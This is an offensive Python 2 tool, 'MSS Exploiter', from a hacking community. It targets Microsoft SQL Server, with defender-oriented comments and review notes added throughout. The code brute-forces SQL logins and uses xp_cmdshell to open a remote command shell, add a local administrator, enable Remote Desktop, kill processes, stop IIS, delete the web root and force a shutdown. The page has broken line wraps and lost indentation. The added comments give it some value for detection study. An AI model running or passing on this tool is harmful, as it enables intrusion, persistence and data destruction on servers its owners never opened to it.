
#!

/usr/bin/python
# Author: [C]orrupted[B]yte
# (c)R00TW0RM - Private Community
# http://r00tw0rm.com/
# Greets: To all members of ROOTW0RM
#
# pwd: R00tW0rmTeam
# apt-get install python-setuptools
# wget http://cython.org/release/Cython-0.16.tar.gz & tar -xzvf Cython-0.16.tar.
gz & cd Cy* & ./setup.py install
# apt-get install rdesktop
#
# [1]Start microsoft shell
# [2]Create user with administrative permissions
# [3]Enable remote desktop
# [4]Disable remote desktop
# [5]connect with remote desktop
# [6]SQL Mannager
# [7]Process killer
# [8]Delete all websites
# [9]Stop/start/restart web server (IIS)
# [10]Shutdown PC
import pymssql
import os
import time
class MSSExploiter():
#Simple dictionary attack
# Defender's reading: online password guessing against a single SQL Server
# login. Candidates are read one per line from dictFile and each one is tried
# with pymssql.connect(); the loop stops when the line counter reaches 47, so
# at most 46 logins are attempted per run.
# Detection: every miss is a failed login for dbUser from one client address.
# With failed-login auditing enabled, SQL Server records these as error 18456.
# Mitigation (general guidance, not shown on this page): keep the instance off
# untrusted networks, disable or rename 'sa', and enforce password policy
# (CHECK_POLICY) on SQL logins.
@staticmethod
def dictAttack(dictFile, dbHost, dbUser):
i = 0
try:
# NOTE(review): the file handle is never closed.
f = open(dictFile, 'r')
while True:
i = i + 1
line = f.readline()
if not line: break
dbPass = line.strip()
# Hard stop on the 47th line read; that line itself is not tried.
if (i == 47):
print '[!]unable to find the password try again'
break
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=db
Pass)
# Python 2 input() evaluates whatever is typed at this prompt, and the
# recovered password is written to the terminal in clear text.
input('[!]Succesfull connection with password: ' +dbPass)
break
# Bare except: any failure (network, driver, login) counts as a wrong password.
except:
print 'Working...'
continue
# Bare except: reported as a dictionary-open failure whatever actually went wrong.
except:
print '[!]Imposible open dictionary'
time.sleep(3)
#Microsoft SQL Server Shell
# Defender's reading: interactive command loop over xp_cmdshell. Each line the
# operator types is formatted into the T-SQL string with % (no
# parameterization) and executed on the database host; the result rows are
# printed back. The prompt text comes from the host's own `hostname` output.
# Detection: xp_cmdshell runs its command through cmd.exe as a child of
# sqlservr.exe, so process-creation logging on the server shows that
# parent/child pair.
# Mitigation: xp_cmdshell is disabled by default on SQL Server 2005 and later,
# and by default only sysadmin members can run it. Application logins should
# not hold sysadmin, and the service account should be low-privileged.
@staticmethod
def mssShell(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
except:
print 'Connection faulier'
exit()

cur = conn.cursor()
cur.execute("exec master.dbo.xp_cmdshell 'hostname'")
hostname = cur.fetchone()
# This assignment is overwritten by the raw_input() on the next line.
command = 'y'
command = raw_input(hostname[0] +'~$ ')
while command != 'exit':
cur.execute("exec master.dbo.xp_cmdshell '%s'" % command)
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
command = raw_input(hostname[0] +'~$ ')
conn.close()
#Function for IIS manipulation
# Defender's reading: menu that runs `iisreset /start`, `/stop`, `/restart` or
# `/status` on the database host through xp_cmdshell and prints the output.
# A stop or restart affects every site served by that IIS instance.
# Detection: iisreset.exe started from a cmd.exe whose parent is sqlservr.exe.
# Service-control events for the IIS services stopping or starting outside a
# change window are a second signal.
# Mitigation: keep xp_cmdshell disabled and do not run SQL Server under an
# account that is allowed to control IIS.
@staticmethod
def iisManipulation(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
except:
print 'Connection faulier'
exit()
cur = conn.cursor()
print '::.IIS Manipulation.::'
print '1.-Start iis'
print '2.-Stop iis'
print '3.-Restart iis'
print '4.-Check iis status'
# Placeholder value so the loop is entered; replaced by the first prompt.
op = '1'
while op:
op = raw_input('Choise an option: ')
if op == '1':
cur.execute("exec master.dbo.xp_cmdshell 'iisreset /start'")
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
elif op == '2':
cur.execute("exec master.dbo.xp_cmdshell 'iisreset /stop'")
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
elif op == '3':
cur.execute("exec master.dbo.xp_cmdshell 'iisreset /restart'")
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
elif op == '4':
cur.execute("exec master.dbo.xp_cmdshell 'iisreset /status'")
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
elif op == 'exit':
conn.close()
break
else:
print 'Select a correct option...'
# NOTE(review): the loop prompts again at its top, so this answer appears to
# be discarded. Indentation is lost on this page; confirm against the original.
op = raw_input('Choise an option: ')

#Delete all websites in IIS server


# Defender's reading: destructive action. Runs a recursive, quiet `rmdir` on
# C:\Inetpub\wwwroot\ (the only path named here) through xp_cmdshell, then
# prints whatever the command returned.
# Detection: rmdir or cmd.exe spawned under sqlservr.exe, and file-integrity or
# object-access auditing on the web content root.
# Mitigation: the SQL Server service account should have no write access to web
# content. Keep xp_cmdshell disabled and keep off-host backups of site content.
@staticmethod
def deleteWebsites(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
except:
print 'Connection faulier'
exit()
cur = conn.cursor()
cur.execute("exec master.dbo.xp_cmdshell 'rmdir /s /q C:\Inetpub\wwwroot
\'")
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
time.sleep(3)
conn.close()
#Create admin user
# Defender's reading: persistence step. Runs `net user <name> <password> /add`
# and `net localgroup Administrators <name> /add` on the database host through
# xp_cmdshell, with both values taken from the operator's prompt.
# Detection: Windows Security events 4720 (account created) and 4732 (member
# added to a local group) on the server, plus net.exe running under
# sqlservr.exe. The new password also appears in the command line that
# process-creation logging captures.
# Mitigation: keep xp_cmdshell disabled and run SQL Server under an account
# that is not a local administrator.
@staticmethod
def createAdminUser(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
except:
# NOTE(review): no exit here, so a failed connect leaves `conn` unbound and
# the next line raises NameError.
print '[!]Error'
cur = conn.cursor()
adminUser = raw_input('Introduce the new username: ')
adminPass = raw_input('Introduce the new password: ')
cur.execute("exec master.dbo.xp_cmdshell 'net user %s %s /add'" % (admin
User, adminPass))
cur.execute("exec master.dbo.xp_cmdshell 'net localgroup Administrators
%s /add'" % adminUser)
# The command output is never read, so this message is printed whether or not
# the account was actually created.
print '[!]User %s with password %s created successfully' % (adminUser, a
dminPass)
time.sleep(3)
conn.close()
#Enableremote desktop
# Defender's reading: sets fDenyTSConnections to 0 under
# HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server with `reg add ... /f`,
# executed through xp_cmdshell. That value is the switch that allows Remote
# Desktop connections.
# Detection: registry auditing on that value (for example Sysmon event 13,
# registry value set), and reg.exe running under sqlservr.exe.
# Mitigation: manage the RDP setting through Group Policy so local changes are
# reverted, and keep xp_cmdshell disabled.
@staticmethod
def enableDesktop(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
cur = conn.cursor()
enablingCmd = 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
cur.execute("exec master.dbo.xp_cmdshell '%s'" % enablingCmd)
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
# Bare except: any error in the block above is reported as a connection failure.
except:
print '[!]Connection faulier'
# NOTE(review): if connect() itself failed, `conn` is unbound here.
conn.close()
#Disable remote desktop
# Defender's reading: counterpart of enableDesktop. Writes fDenyTSConnections = 1
# under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server through
# xp_cmdshell, which turns Remote Desktop connections off again.
# Detection: the same registry value and process lineage as the enabling step.
# A 0 -> 1 -> 0 flip on this value over a short period is worth alerting on.
@staticmethod
def disableDesktop(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
cur = conn.cursor()
disablingCmd = 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'
cur.execute("exec master.dbo.xp_cmdshell '%s'" % disablingCmd)

row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
# Bare except: any error in the block above is reported as a connection failure.
except:
print '[!]Connection faulier'
# NOTE(review): if connect() itself failed, `conn` is unbound here.
conn.close()
#Remote desktop
# Launches the local `rdesktop` client against dbHost. Nothing is sent over the
# SQL connection here.
# NOTE(review): dbHost is formatted into a shell string for os.system(), so
# shell metacharacters in it are interpreted on the operator's own machine.
# Detection on the target: an inbound RDP logon (Security event 4624, logon
# type 10) shortly after the registry change made by enableDesktop.
@staticmethod
def remoteConn(dbHost):
try:
os.system("rdesktop %s" % dbHost)
# os.system() returns an exit status rather than raising when the command
# fails. `host` is not defined in this function, so this handler would itself
# raise NameError if it ever ran.
except:
print 'unable to conect with host %s' %host
#shutdown computer
# Defender's reading: availability impact. Runs `shutdown /s /f` on the database
# host through xp_cmdshell; /f force-closes running applications.
# Detection: System log event 1074 records the process and account that
# requested the shutdown. Here that would be the SQL Server service context.
# Mitigation: the SQL Server service account should not hold the
# "Shut down the system" user right, and xp_cmdshell should stay disabled.
@staticmethod
def shutDownPc(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
except:
print 'Connection faulier'
exit()
cur = conn.cursor()
try:
cur.execute("exec master.dbo.xp_cmdshell 'shutdown /s /f'")
# The message is fixed text; the command's own output is not read.
print 'shutting down in 30 seconds...'
time.sleep(5)
except:
print 'cannot shutdown the PC'
time.sleep(3)
conn.close()
#kill porcess
# Defender's reading: lists processes on the database host with `tasklist`, then
# runs `taskkill /PID <value>` with the value typed by the operator. Both go
# through xp_cmdshell, and the PID is interpolated without validation.
# Detection: tasklist.exe or taskkill.exe under sqlservr.exe, and unexpected
# termination of security or backup agents on the server.
# Mitigation: enable tamper protection on endpoint agents, use a low-privileged
# SQL Server service account, and keep xp_cmdshell disabled.
@staticmethod
def killProcess(dbHost, dbUser, dbPass):
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass)
except:
print '[!]Connection faulier'
exit()
cur = conn.cursor()
cur.execute("exec master.dbo.xp_cmdshell 'tasklist'")
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
PID = raw_input('Introduce PID process to kill: ')
cur.execute("exec master.dbo.xp_cmdshell 'taskkill /PID %s'" % PID)
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
time.sleep(3)
conn.close()
#SQL Manager
# Defender's reading: ad-hoc SQL console. Connects to `master`, prints the first
# column of master.dbo.SysDatabases, reconnects to the database the operator
# names, then executes every typed line as SQL and prints the rows.
# Exposure is bounded by what the login is permitted to read or change.
# Detection: SQL Server Audit or a trace on the login shows catalog enumeration
# (SysDatabases, INFORMATION_SCHEMA.TABLES) followed by free-form queries from
# a client that is not the application.
# Mitigation: least-privilege database roles for application logins, and
# per-database users instead of a shared high-privilege login.
@staticmethod
def sqlManager(dbHost, dbUser, dbPass):
print '::.SQL Manager.::'
try:
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass, da
tabase='master')

cur = conn.cursor()
cur.execute('SELECT * FROM master.dbo.SysDatabases')
row = cur.fetchone()
while row:
print row[0]
row = cur.fetchone()
except:
print 'Connection faulier'
exit()
dbName = raw_input('Choise a database: ')
# NOTE(review): this second connect is outside any try block, and the first
# connection is replaced without being closed.
conn = pymssql.connect(host=dbHost, user=dbUser, password=dbPass, databa
se=dbName)
cur = conn.cursor()
# This assignment is overwritten by the raw_input() on the next line.
command = 'y'
command = raw_input('SQL Manager~$ ')
while command != 'exit':
# 'SHOW TABLES' is handled as a local alias: it prints column index 2 of
# INFORMATION_SCHEMA.TABLES for base tables.
if command == 'SHOW TABLES':
cur.execute("SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE
_TYPE = 'BASE TABLE'")
row = cur.fetchone()
while row:
print row[2]
row = cur.fetchone()
# NOTE(review): there is no else/continue visible, so the alias text also
# appears to fall through to the execute below. Indentation is lost on this
# page; confirm against the original.
try:
cur.execute('%s' % command)
row = cur.fetchone()
while row:
print row
row = cur.fetchone()
# Bare except: every SQL error is swallowed and shown as an empty line.
except:
print ''
command = raw_input('SQL Manager~$ ')
class main():
#Main function
def mainMenu():
print '___ ___ _____ _____ _____
_
_ _'
print '| \/ |/ ___/ ___| | ___|
| |
(_) |'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _| |_ ___ _ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| | __/ _ \ __|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | | || __/ |'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|\__\___|_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Enter SQL credentials'
print '[2]Dictionary attack'
op = raw_input('Choise an option: ')
while op:
if op == '1':
os.system('clear')
dbHost = raw_input('Introduce the ip host to connect: ')
dbUser = raw_input('Introduce the DB user: ')
dbPass = raw_input('Introduce the DB password: ')
os.system('clear')
print '___ ___ _____ _____ _____
_
_ _'
print '| \/ |/ ___/ ___| | ___|
| |
(_) |'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _| |_ ___
_ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| | __/ _ \

__|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | | || __/
|'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|\__\___|
_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Start microsoft shell'
print '[2]Create user with administrative permissions'
print '[3]Enable remote desktop'
print '[4]Disable remote desktop'
print '[5]connect with remote desktop'
print '[6]SQL Mannager'
print '[7]Process killer'
print '[8]Delete all websites'
print '[9]Stop/start/restart web server (IIS)'
print '[10]Shutdown PC'
op = raw_input('Choise an option: ')
while op:
if op == '1':
os.system('clear')
f = MSSExploiter()
f.mssShell(dbHost, dbUser, dbPass)
os.system('clear')
print '___ ___ _____ _____ _____
_

_'
print '| \/ |/ ___/ ___| | ___|

| |

(_)

|'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _|
|_ ___ _ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| |
__/ _ \ __|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | |
|| __/ |'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|
\__\___|_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Start microsoft shell'
print '[2]Create user with administrative permissions'
print '[3]Enable remote desktop'
print '[4]Disable remote desktop'
print '[5]connect with remote desktop'
print '[6]SQL Mannager'
print '[7]Process killer'
print '[8]Delete all websites'
print '[9]Stop/start/restart web server (IIS)'
print '[10]Shutdown PC'
op = raw_input('Choise an option: ')
elif op == '2':
os.system('clear')
f = MSSExploiter()
f.createAdminUser(dbHost, dbUser, dbPass)
os.system('clear')
print '___ ___ _____ _____ _____
_
_
_'

print '| \/ |/ ___/ ___| | ___|

| |

(_)

|'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _|
|_ ___ _ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| |
__/ _ \ __|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | |
|| __/ |'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|
\__\___|_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Start microsoft shell'
print '[2]Create user with administrative permissions'
print '[3]Enable remote desktop'
print '[4]Disable remote desktop'
print '[5]connect with remote desktop'
print '[6]SQL Mannager'
print '[7]Process killer'
print '[8]Delete all websites'
print '[9]Stop/start/restart web server (IIS)'
print '[10]Shutdown PC'
op = raw_input('Choise an option: ')
elif op == '3':
f = MSSExploiter()
f.enableDesktop(dbHost, dbUser, dbPass)
op = raw_input('\nChoise an option: ')
elif op == '4':
f = MSSExploiter()
f.disableDesktop(dbHost, dbUser, dbPass)
op = raw_input('\nChoise an option: ')
elif op == '5':
f = MSSExploiter()
f.remoteConn(dbHost)
op = raw_input('\nChoise an option: ')
elif op == '6':
os.system('clear')
f = MSSExploiter()
f.sqlManager(dbHost, dbUser, dbPass)
os.system('clear')
print '___ ___ _____ _____ _____
_
_
_'
print '| \/ |/ ___/ ___| | ___|

| |

(_)

|'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _|
|_ ___ _ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| |
__/ _ \ __|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | |
|| __/ |'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|
\__\___|_|'
print
print
print
print
print
print

'
| |'
'
|_|'
'(c)R00TW0RM Coders Team - Private Community'
'.::Coded by [C]orrupted[B]yte::.\n'
'[1]Start microsoft shell'
'[2]Create user with administrative permissions'

print '[3]Enable remote desktop'


print '[4]Disable remote desktop'
print '[5]connect with remote desktop'
print '[6]SQL Mannager'
print '[7]Process killer'
print '[8]Delete all websites'
print '[9]Stop/start/restart web server (IIS)'
print '[10]Shutdown PC'
op = raw_input('Choise an option: ')
elif op == '7':
os.system('clear')
f = MSSExploiter()
f.killProcess(dbHost, dbUser, dbPass)
os.system('clear')
print '___ ___ _____ _____ _____
_

_'
print '| \/ |/ ___/ ___| | ___|

| |

(_)

|'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _|
|_ ___ _ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| |
__/ _ \ __|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | |
|| __/ |'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|
\__\___|_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Start microsoft shell'
print '[2]Create user with administrative permissions'
print '[3]Enable remote desktop'
print '[4]Disable remote desktop'
print '[5]connect with remote desktop'
print '[6]SQL Mannager'
print '[7]Process killer'
print '[8]Delete all websites'
print '[9]Stop/start/restart web server (IIS)'
print '[10]Shutdown PC'
op = raw_input('Choise an option: ')
elif op == '8':
f = MSSExploiter()
f.deleteWebsites(dbHost, dbUser, dbPass)
op = raw_input('\nChoise an option: ')
elif op == '9':
os.system('clear')
f = MSSExploiter()
f.iisManipulation(dbHost, dbUser, dbPass)
os.system('clear')
print '___ ___ _____ _____ _____
_
_
_'
print '| \/ |/ ___/ ___| | ___|

| |

(_)

|'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _|
|_ ___ _ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| |
__/ _ \ __|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | |
|| __/ |'

print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|


\__\___|_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Start microsoft shell'
print '[2]Create user with administrative permissions'
print '[3]Enable remote desktop'
print '[4]Disable remote desktop'
print '[5]connect with remote desktop'
print '[6]SQL Mannager'
print '[7]Process killer'
print '[8]Delete all websites'
print '[9]Stop/start/restart web server (IIS)'
print '[10]Shutdown PC'
op = raw_input('Choise an option: ')
elif op == '10':
f = MSSExploiter()
f.shutDownPc(dbHost, dbUser, dbPass)
op = raw_input('\nChoise an option: ')
elif op == 'exit':
break
else:
print 'Select a correct option...'
op = raw_input('Choise an option: ')
elif op == '2':
os.system('clear')
f = MSSExploiter()
dictFile = raw_input('Introduce the dictionary passwords name: '
)
dbUser = raw_input('Introduce user DB to try: ')
dbHost = raw_input('Introduce the ip host to attack: ')
f.dictAttack(dictFile, dbHost, dbUser)
os.system('clear')
print '___ ___ _____ _____ _____
_
_ _'
print '| \/ |/ ___/ ___| | ___|
| |
(_) |'
print '| . . |\ `--.\ `--. | |____ ___ __ | | ___ _| |_ ___
_ __'
print '| |\/| | `--. \`--. \ | __\ \/ / _ \| |/ _ \| | __/ _ \
__|'
print '| | | |/\__/ /\__/ / | |___> <| |_) | | (_) | | || __/
|'
print '\_| |_/\____/\____/ \____/_/\_\ .__/|_|\___/|_|\__\___|
_|'
print '
| |'
print '
|_|'
print '(c)R00TW0RM Coders Team - Private Community'
print '.::Coded by [C]orrupted[B]yte::.\n'
print '[1]Enter SQL credentials'
print '[2]Dictionary attack'
op = raw_input('Choise an option: ')
elif op == 'exit':
break
else:
print 'Select a correct option...'
op = raw_input('Choise an option: ')
os.system('clear')
mainMenu()